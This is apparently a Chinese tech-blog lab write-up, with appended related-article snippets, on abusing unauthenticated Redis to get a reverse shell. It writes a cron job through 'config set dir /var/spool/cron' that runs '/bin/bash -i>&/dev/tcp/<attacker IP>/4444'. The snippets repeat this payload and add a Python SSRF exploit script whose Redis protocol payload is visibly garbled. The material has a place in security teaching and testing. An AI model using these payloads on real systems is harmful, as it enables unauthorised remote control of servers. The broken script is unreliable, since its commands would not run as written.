redis未授权访问反弹shell

最新推荐文章于 2025-05-13 10:22:15 发布
最新推荐文章于 2025-05-13 10:22:15 发布
阅读量4.6k 收藏 2
点赞数
CC 4.0 BY-SA版权
分类专栏: 安全漏洞 文章标签: redis未授权访问反弹shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/sdb5858874/article/details/80822536
本文介绍如何在Linux环境下安装Redis,并详细说明了配置Redis允许远程访问的过程。包括使用wget下载安装包、编译安装、配置redis.conf文件允许公网访问等步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、redis的安装
1.使用wget命令获取redis的安装包
wget http://download.redis.io/releases/redis-4.0.8.tar.gz

2.tar –zxvf redis-4.0.8.tar.gz
解压改文件
然后进入redis-4.0.8这个文件夹   cd redis-4.0.8
然后执行make命令
由于我们刚刚安装好redis数据库,还未创建用户,默认使用的是6379端口,没有密码,这个时候会导致未授权访问
3.安装完redis之后我们要更改一下配置文件  redis.conf     默认配置是只允许127.0.0.1本机回环地址连接redis数据库。
下面操作的意思是允许公网上的其他计算机访问redis数据库
先将redis.conf配置文件复制到当前目录下的src文件夹
cp redis.conf  ./scr/redis.conf
在其中修改
bind 127.0.0.1  前面加上#注释符   
protected-mode 设为no
daemonize no
保存退出
启动redis-server
./src/redis-server redis.conf



4.我们使用kali系统作为攻击人连接redis数据库
本次测试使用kali IP:192.168.1.108
Centos IP:192.168.1.107
redis-cli -h 192.168.1.107 -p 6379
"\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.1.108/4444 0>&1\n\n"
config set dir /var/spool/cron
config set dbfilename root
save
然后使用ns命令监听本机4444端口
ns -l 4444
讲道理应该能连上的,但是没连上,问题后续解决,步骤应该没问题。。。




Redis未授权访问反弹shell
Sylon的博客
11-21 1490
0x01:前言 这是10月份写的文章 一直放到电脑上居然忘掉了 我丢!! Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivotal赞助。 Redis因配置不当可以未授权访问(窃取数据、反弹sh...
未授权访问Redis未授权访问漏洞
qq_68163788的博客
05-08 1418
未经授权访问是指在Redis数据库中,未经过身份验证或授权的情况下访问数据库的行为。Redis是一种流行的开源内存数据库,用于存储数据并提供快速访问。如果Redis实例未经过适当的安全配置,攻击者可以利用这一漏洞,访问敏感数据,修改数据或甚至破坏数据库。未经授权访问可能导致数据泄露、数据损坏和系统崩溃等严重后果。为了防止未经授权访问,管理员应该采取必要的安全措施,例如设置访问控制列表、使用密码进行身份验证和定期更新Redis的安全配置。通过加强安全措施,可以有效防止未经授权访问Redis数据库造成的风险。
Redis未授权访问反弹shell
Zlirving_的博客
06-17 2349
Redis简介 Redis 是一个高性能的key-value数据库。为了保证效率,数据都是缓存在内存中。redis会周期性的把更新的数据写入磁盘或者把修改操作写入追加的记录文件,并且在此基础上实现了master-slave(主从)同步   漏洞简介 1、什么是redis未授权访问漏洞 Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证,会导致任意
【渗透测试】反弹Shell与WebShell详细对比解析(通俗版)
最新发布
凪的博客
05-13 797
反弹Shell和WebShell是攻击者控制目标服务器的两种常见工具,尽管它们的目标相同,但实现方式和适用场景有所不同。反弹Shell通过让服务器主动连接攻击者来建立控制通道,适合绕过防火墙限制,且无文件残留,隐蔽性较高。WebShell则是通过上传脚本文件到服务器,攻击者通过浏览器发送指令执行命令,适合已有文件上传漏洞的场景,但容易被安全软件检测。两者都依赖漏洞利用(如SSRF),攻击者可根据具体场景选择或组合使用。反弹Shell适合动态穿透防火墙,WebShell适合文件可控场景,实际攻击中常结合使用以
Redis未授权访问反弹shell记录
fengqingyuel的博客
10-09 478
环境配置情况: 攻击机:kali-2021.2 ,配置IP:10.1.25.44 redis靶机:CentOS 7.2 ,配置IP:10.3.70.70 1、在攻击机(10.1.25.44)先建立监听。 nc -nvlp 7788 2、在连接redis的客户端依次执行以下命令。 set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/10.1.25.44/7788 0>&1\n\n" //往当前用户的cronta
redis 未授权访问配合计划任务反弹shell
m0_65096687的博客
05-23 1719
(1)redis绑定在 0.0.0.0:6379,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网;(2)没有设置密码认证(一般为空),可以免密码远程登录redis服务。然后直接本地开个nc。
redis未授权反弹shell
weixin_34235371的博客
05-15 232
rt发现一处redis未授权,进行反弹shell。输入反弹命令:主机监听端口:反弹成功。 转载于:https://blog.51cto.com/13539934/2395206
ssrf结合redis未授权getshell
07-07 1587
原理即为攻击者通过SSRF访问内网或本地的redis6379端口,如果刚好存在redis未授权,即可getshell
如何通过redis未授权访问漏洞反弹shell
qq_42671480的博客
05-20 1543
如何通过redis未授权访问漏洞反弹shell 1.搭建redis服务器和客户端 我用centos作为靶机,用kali作为攻击方来进行实验。 下载,解压,编译: $ wget http://download.redis.io/releases/redis-4.0.10.tar.gz $ tar xzf redis-4.0.10.tar.gz $ mv redis-4.0.10 /usr/loc...
漏洞复现之Redis未授权访问
m0_56190544的博客
09-13 2951
本文详细介绍了redis未授权访问漏洞的原理以及利用方法,供大家参考学习
[Shell]Redis未授权访问反弹shell
baguangman5501的博客
09-08 526
原作者:Cream 文章出处: 贝塔安全实验室 0x01 Redis未授权访问反弹shell Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivotal赞助。 Redis因配置不当可以未授权...
网络安全——redis未授权访问漏洞写入计划任务反弹shell
Demo不是emo的博客
09-17 6052
redis未授权访问漏洞,顾名思义,就是不需要输入账密就可以直接登录(含redis服务安装包分享),本文介绍了怎么利用该漏洞获取目标shell
redis未授权访问getshell的方式
居上
06-28 2147
redis简介 Redis是一个开源的使用ANSI C语言编写、遵守BSD协议、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库 端口:6379 环境 kali =>192.168.60.134 cenos => 192.168.60.130 redis未授权访问 Redis默认情况下,会绑定在0.0.0.0:6379,如果没有采用相关的策略,如配置防火墙规则避免其他非信任来源的IP访问,就会将Redis服务暴露在公网上 ./redis-server 使用默认配置 ./red
Windows反弹shell测试
oscarli的博客
05-30 427
windows反弹shell测试记录
Redis未授权访问漏洞原理
2301_80976241的博客
02-19 1723
Redis,全称为Remote Dictionary Server(远程字典服务器),是一种开源的内存数据结构存储系统,主要用作数据库、缓存和消息中间件。redis支持多种类型的数据结构,如字符串(strings),散列(hashes), 列表(lists),集合(sets),有序集合(sorted sets)。redis数据库能够存储的数据类型很丰富,应用场景多,同时纯内存的数据结构使它的读写速度很快,功能特性也在逐步丰富。
Redis未授权访问漏洞复现与GETSHELL利用方法汇总(含靶场搭建)
W小哥
09-18 2851
一、漏洞产生原因 redis安装完之后,默认情况下绑定在 0.0.0.0:6379,且没有对登录IP做限制,并且没有设置密码(默认为空)。 二、漏洞危害 攻击者无需认证即可访问到内部数据,可能导致敏感信息泄露,黑客也可以恶意执行flushall来清空所有数据; 攻击者可通过EVAL执行lua代码,或通过数据备份功能往磁盘写入后门文件; 最严重的情况,如果Redis以root身份运行,黑客可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器。 三、靶场搭建 3.1、redis数据库下载安装 访问
漏洞复现 - - - 未授权访问漏洞Redis
weixin_67503304的博客
08-13 5204
未授权访问漏洞Redis, 通过redis数据备份功能,往WEB网站根目录写入一句话木马,利用shell得到WEB网站权限,通过定时任务反弹Shell,写SSH公钥,实现免密登录linux服务器
2021-8-1Redis计划任务反弹shell
qq_45290991的博客
08-01 2388
前段时间忙着毕业,终于现在毕业了,在愉快而紧张地等待毕业前期,我开始了Redis的学习。。。 一、搭建安装配置Redis数据库 我听说在centOS下可以Redis结合计划任务反弹shell成功,Ubuntu貌似不行 ...
shell脚本实现批量自动redis反弹shell攻击
十月鱼的博客(本博客不再更新,作者迁移至:http://wiki.51centos.com)
04-03 1590
一、shell实现redis反弹shell [root@xingcheng attack]# cat shell_rebound.sh #!/bin/bash ##create by xingcheng ##20180403 ##function 批量redis反弹shell获取系统权限,主要针对没有安全策略的reids服务器和弱口令redis服务器,他们往往使用root账户运行 #ip_...
ssrf 反弹shell
01-06
### SSRF 漏洞利用反弹 Shell 的技术细节 #### 一、SSRF漏洞概述 SSRF (Server-Side Request Forgery, 服务器端请求伪造)是一种安全漏洞,允许攻击者构造恶意请求,使应用程序向指定的URL发送HTTP请求。这种攻击通常用于访问内部网络资源或绕过防火墙限制[^4]。 #### 二、利用过程详解 当存在SSRF漏洞的应用程序能够与内网中的Redis服务通信时,可以通过以下方式实现反弹Shell: 1. **获取未授权访问权限** 如果目标环境内的Redis实例配置不当,默认情况下监听所有接口且无需密码验证,则可以直接连接并执行命令[^3]。 2. **设置持久化后门** 攻击者可利用`CONFIG SET dir /var/spool/cron/`指令改变默认保存路径至cron任务文件夹;再通过`CONFIG SET dbfilename root`创建名为root的新数据库文件,在其中植入恶意代码片段[^2]。 3. **触发反弹Shell行为** 将精心设计过的bash脚本作为定时作业写入上述位置,确保其每隔一段时间尝试建立反向外联通道指向攻击者的机器。例如: ```bash * * * * * bash -i >& /dev/tcp/yourip/6666 0>&1 ``` 4. **维持会话控制** 成功建立TCP连接之后便可以在受害主机上获得交互式的shell终端,进一步实施更多类型的渗透测试活动[^1]。 ```python import requests def exploit_ssrf(redis_ip, attacker_ip, port=6666): payload = f"*1\r\n$8\r\nFLUSHALL\r\n*3\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$3\ndir\r\n$5\r\n/var/\r\nspool/cron/\r\n*3\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$9\r\ndbfilename\r\n$4\r\nroot\r\n*2\r\n$4\r\nAUTH\r\n$7\r\npassword\r\n*2\r\n$4\r\nEVAL\r\n\"os.execute('echo \"* * * * * bash -i >& /dev/tcp/{attacker_ip}/{port} 0>&1\">>/var/spool/cron/root')\"\r\n" headers = {"Content-Type": "application/x-www-form-urlencoded"} data = {'data':payload} try: response = requests.post(f"http://{redis_ip}:6379",headers=headers,data=data) print(response.status_code) except Exception as e: print(e) exploit_ssrf("internal.redis.server","external.attacker.ip") ```
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值